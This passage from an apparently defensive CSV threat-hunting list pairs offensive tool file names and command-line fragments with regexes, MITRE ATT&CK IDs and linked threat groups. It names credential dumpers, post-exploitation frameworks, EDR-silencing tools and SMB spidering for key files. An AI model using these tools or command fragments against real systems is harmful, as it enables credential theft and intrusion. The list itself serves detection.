Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.","T1003.001 - T1027.004 - T1560.001 - T1039 - T1570","TA0006 - TA0005 - TA0010 - TA0003","N/A","N/A","Credential Access","https://github.com/tastypepperoni/PPLBlade","1","0","N/A","N/A","10","6","545","59","2023-08-30T07:59:51Z","2023-08-29T19:36:04Z","1003" "* DumpSvc.exe*",".{0,1000}\sDumpSvc\.exe.{0,1000}","offensive_tool_keyword","PWDumpX","PWDumpX tool allows a user with administrative privileges to retrieve the encrypted password hashes and LSA secrets from a Windows system. This tool can be used on the local system or on one or more remote systems.","T1003.001 - T1555.003 - T1077","TA0006 - TA0008","N/A","N/A","Credential Access","https://packetstormsecurity.com/files/download/52580/PWDumpX.zip","1","0","N/A","N/A","10","8","N/A","N/A","N/A","N/A","1005" "* duplicates.nse*",".{0,1000}\sduplicates\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1006" "* dynasty.sh*",".{0,1000}\sdynasty\.sh.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","#linux","N/A","9","2","153","17","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z","1007" "* -e bat com vbs ps1 psd1 psm1 pem key rsa pub reg txt cfg conf config *",".{0,1000}\s\-e\sbat\scom\svbs\sps1\spsd1\spsm1\spem\skey\srsa\spub\sreg\stxt\scfg\sconf\sconfig\s.{0,1000}","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","N/A","8","10","1117","138","2024-07-18T06:14:04Z","2020-03-18T13:27:20Z","1008" "* -e pfx p12 pkcs12 pem key crt cer csr jks keystore key keys der *",".{0,1000}\s\-e\spfx\sp12\spkcs12\spem\skey\scrt\scer\scsr\sjks\skeystore\skey\skeys\sder\s.{0,1000}","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. 
Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","N/A","8","10","1117","138","2024-07-18T06:14:04Z","2020-03-18T13:27:20Z","1009" "* -e ppk rsa pem ssh rsa*",".{0,1000}\s\-e\sppk\srsa\spem\sssh\srsa.{0,1000}","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","N/A","8","10","1117","138","2024-07-18T06:14:04Z","2020-03-18T13:27:20Z","1010" "* -e shinject -r -E -t *",".{0,1000}\s\-e\sshinject\s\-r\s\-E\s\-t\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","packer bundled","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","1011" "* e2e_test.py*",".{0,1000}\se2e_test\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","1012" "* eap-info.nse*",".{0,1000}\seap\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1013" "* EASSniper.ps1*",".{0,1000}\sEASSniper\.ps1.{0,1000}","offensive_tool_keyword","EASSniper","EASSniper is a penetration testing tool for account enumeration and brute force attacks against Exchange Active Sync (EAS)","T1110 - T1078.003 - T1087.002 - T1059.001","TA0006 -TA0007 - TA0009 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/fugawi/EASSniper","1","0","N/A","N/A","10","1","5","4","2018-04-17T23:23:31Z","2018-04-17T22:43:51Z","1014" "* EASSniper.ps1*",".{0,1000}\sEASSniper\.ps1.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","0","N/A","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","1015" "* eas-valid-users.txt*",".{0,1000}\seas\-valid\-users\.txt.{0,1000}","offensive_tool_keyword","EASSniper","EASSniper is a penetration testing tool for account enumeration and brute force attacks against Exchange Active Sync (EAS)","T1110 - T1078.003 - T1087.002 - T1059.001","TA0006 -TA0007 - TA0009 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/fugawi/EASSniper","1","0","N/A","N/A","10","1","5","4","2018-04-17T23:23:31Z","2018-04-17T22:43:51Z","1016" "* ebapc_injection.exe*",".{0,1000}\sebapc_injection\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red 
Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","1017" "* ebowla.py*",".{0,1000}\sebowla\.py.{0,1000}","offensive_tool_keyword","Ebowla","Framework for Making Environmental Keyed Payloads","T1027.002 - T1059.003 - T1140","TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/Genetic-Malware/Ebowla","1","0","N/A","N/A","10","8","748","171","2019-01-28T10:45:15Z","2016-04-07T22:29:58Z","1018" "* ecrprivenum.py*",".{0,1000}\secrprivenum\.py.{0,1000}","offensive_tool_keyword","quiet-riot","Unauthenticated enumeration of AWS - Azure and GCP Principals","T1087 - T1083 - T1210","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/righteousgambit/quiet-riot","1","0","N/A","N/A","6","3","224","30","2024-11-13T19:41:26Z","2021-10-28T15:12:27Z","1020" "* ecrpubenum.py*",".{0,1000}\secrpubenum\.py.{0,1000}","offensive_tool_keyword","quiet-riot","Unauthenticated enumeration of AWS - Azure and GCP Principals","T1087 - T1083 - T1210","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/righteousgambit/quiet-riot","1","0","N/A","N/A","6","3","224","30","2024-11-13T19:41:26Z","2021-10-28T15:12:27Z","1021" "* edge logindata *",".{0,1000}\sedge\slogindata\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 
- T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/crypt0p3g/bof-collection","1","0","N/A","N/A","10","10","175","27","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z","1022" "* edge masterkey *",".{0,1000}\sedge\smasterkey\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - 
AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/crypt0p3g/bof-collection","1","0","N/A","N/A","10","10","175","27","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z","1023" "* EdgeDump.ahk*",".{0,1000}\sEdgeDump\.ahk.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","1024" "* ediH:edoMwodniWwohS-*",".{0,1000}\sediH\:edoMwodniWwohS\-.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","N/A","10","10","1530","316","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z","1025" "* edraser.py*",".{0,1000}\sedraser\.py.{0,1000}","offensive_tool_keyword","EDRaser","EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.","T1070.004 - T1027 - 
T1564.001","TA0005 - TA0040 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/EDRaser","1","0","N/A","N/A","10","4","363","49","2024-04-06T17:42:40Z","2023-08-10T04:30:45Z","1026" "* EDRSilencer.c*",".{0,1000}\sEDRSilencer\.c.{0,1000}","offensive_tool_keyword","EDRSilencer","A tool uses Windows Filtering Platform (WFP) to block Endpoint Detection and Response (EDR) agents from reporting security events to the server","T1562.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/netero1010/EDRSilencer","1","0","N/A","N/A","10","10","1645","209","2024-11-03T16:05:14Z","2023-12-26T04:15:39Z","1027" "* EfiDSEFix.cpp*",".{0,1000}\sEfiDSEFix\.cpp.{0,1000}","offensive_tool_keyword","EfiGuard","EfiGuard is a portable x64 UEFI bootkit that patches the Windows boot manager - boot loader and kernel at boot time in order to disable PatchGuard and Driver Signature Enforcement (DSE).","T1542.002 - T1542.003 - T1542.004","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mattiwatti/EfiGuard","1","0","N/A","N/A","10","10","1977","354","2025-02-24T11:57:36Z","2019-03-25T19:47:39Z","1028" "* EfsPotato*",".{0,1000}\sEfsPotato.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","1029" "* Egress-Assess's FTP server*",".{0,1000}\sEgress\-Assess\'s\sFTP\sserver.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","N/A","can be used 
for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","1030" "* -ElevatedPersistenceOption *",".{0,1000}\s\-ElevatedPersistenceOption\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","Persistence.psm1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","1031" "* 
emailall.py*",".{0,1000}\semailall\.py.{0,1000}","offensive_tool_keyword","EmailAll","EmailAll is a powerful Email Collect tool","T1114.001 - T1113 - T1087.003","TA0009 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Taonn/EmailAll","1","0","N/A","N/A","6","8","715","117","2022-03-04T10:36:41Z","2022-02-14T06:55:30Z","1032" "* empire.arguments*",".{0,1000}\sempire\.arguments.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","1033" "* empire.client.*",".{0,1000}\sempire\.client\..{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that 
is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","1034" "* empire.py*",".{0,1000}\sempire\.py.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - 
T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","1035" "* empire_exec*",".{0,1000}\sempire_exec.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","1036" "* empireadmin*",".{0,1000}\sempireadmin.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","1037" "* enable_all_tokens.exe*",".{0,1000}\senable_all_tokens\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","1038" "* EnableAllMacros_AMSI.py*",".{0,1000}\sEnableAllMacros_AMSI\.py.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense 
Evasion","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","1039" "* EnableAllMacros_AMSI.vba*",".{0,1000}\sEnableAllMacros_AMSI\.vba.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","1040" "* EnableAllTokenPrivs.exe*",".{0,1000}\sEnableAllTokenPrivs\.exe.{0,1000}","offensive_tool_keyword","EnableAllTokenPrivs","Enable or Disable TokenPrivilege(s)","T1134 - T1055","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/xvt-void/EnableAllTokenPrivs","1","0","N/A","N/A","7","1","13","5","2024-05-17T12:43:43Z","2024-02-17T15:39:25Z","1041" "* EnableAllTokenPrivs.ps1*",".{0,1000}\sEnableAllTokenPrivs\.ps1.{0,1000}","offensive_tool_keyword","EnableAllTokenPrivs","Enable or Disable TokenPrivilege(s)","T1134 - T1055","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/xvt-void/EnableAllTokenPrivs","1","0","N/A","N/A","7","1","13","5","2024-05-17T12:43:43Z","2024-02-17T15:39:25Z","1042" "* -enabled -u * -p * -old-bloodhound*",".{0,1000}\s\-enabled\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-old\-bloodhound.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","1043" "* -encrypt * -process * -sandbox *",".{0,1000}\s\-encrypt\s.{0,1000}\s\-process\s.{0,1000}\s\-sandbox\s.{0,1000}","offensive_tool_keyword","Freeze","Freeze is a payload toolkit for bypassing EDRs using suspended processes. direct syscalls. 
and alternative execution methods","T1055 - T1055.001 - T1055.003 - T1055.004 - T1055.005 - T1055.006 - T1055.007 - T1055.008 - T1055.012 - T1055.013 - T1055.014 - T1055.015 - T1055.016 - T1055.017 - T1055.018 - T1055.019 - T1055.020 - T1055.021 - T1055.022 - T1055.023 - T1055.024 - T1055.025 - T1112","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/Freeze","1","0","N/A","N/A","N/A","10","1437","187","2023-08-18T17:25:07Z","2022-09-21T14:40:59Z","1044" "* encrypthub_steal.ps1*",".{0,1000}\sencrypthub_steal\.ps1.{0,1000}","offensive_tool_keyword","Kematian Stealer","Fake WinRar site distributes malware (+stealer +miner +hvnc +ransomware) from GitHub","T1195 - T1566 - T1569 - T1106 - T1486 - T1113","TA0001 - TA0002 - TA0005 - TA0006 - TA0007 - TA0009 - TA0010 - TA0011 - TA0040 - TA0043","N/A","N/A","Malware","https://github[.]com/sap3r-encrypthub/encrypthub","1","0","N/A","N/A","10","7","N/A","N/A","N/A","N/A","1045" "* 